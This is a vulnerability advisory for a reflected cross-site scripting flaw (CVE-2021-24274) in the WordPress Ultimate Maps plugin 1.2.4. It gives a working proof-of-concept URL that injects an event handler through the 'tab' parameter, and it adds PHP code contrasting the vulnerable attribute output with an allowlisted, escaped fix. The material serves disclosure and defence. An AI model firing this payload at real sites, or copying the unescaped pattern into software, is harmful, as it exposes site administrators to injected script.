WordPress Ultimate Maps plugin version 1.2.4 suffers from a cross site scripting vulnerability.
advisories | CVE-2021-24274
# Exploit Title: WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/ultimate-maps-by-supsystic/
# Version: 1.2.4
# Tested on: Windows 10
# CVE: CVE-2021-24274

1. Description:
The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue.
2. Proof of Concept:
/wp-admin/admin.php?page=ultimate-maps-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
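The unsanitized-attribute pattern from the description, next to a hardened form, as an added PHP illustration that is not the plugin's source. The function names, markup and tab list are hypothetical; the sample input is the query string from the proof of concept.

```php
<?php
// Added illustration, not the plugin's code. Names, markup and tab list are hypothetical.

// Sample input: the proof-of-concept query string, decoded the way PHP fills $_GET.
$query = 'page=ultimate-maps-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//';
parse_str($query, $params);

// Vulnerable pattern: a request value concatenated straight into a quoted attribute.
function render_tab_vulnerable(string $tab): string
{
    return '<div class="tab-content" data-tab="' . $tab . '"></div>';
}

// Hardened pattern: allowlist the value, then escape it for attribute context.
function render_tab_hardened(string $tab, array $allowed, string $default): string
{
    if (!in_array($tab, $allowed, true)) {
        $tab = $default;   // unknown tab names never reach the markup
    }
    // Inside WordPress, esc_attr() is the idiomatic call for this step.
    $safe = htmlspecialchars($tab, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="tab-content" data-tab="' . $safe . '"></div>';
}

// Check helper: parse the markup and list the attributes the <div> ends up with.
function attribute_names(string $html): array
{
    $previous = libxml_use_internal_errors(true);   // tolerate malformed markup
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    $names = [];
    foreach ($doc->getElementsByTagName('div')->item(0)->attributes as $attr) {
        $names[] = $attr->nodeName;
    }
    return $names;
}

$allowed = ['overview', 'maps', 'settings'];   // hypothetical tab names

$before = render_tab_vulnerable($params['tab']);
$after  = render_tab_hardened($params['tab'], $allowed, 'overview');

// Extra attributes in the first list mean the value escaped its quotes.
echo 'vulnerable: ', implode(', ', attribute_names($before)), PHP_EOL;
echo 'hardened:   ', implode(', ', attribute_names($after)), PHP_EOL;
```

The same attribute-listing check can be run against a rendered options page in a regression test to confirm that the tab value never contributes attributes of its own.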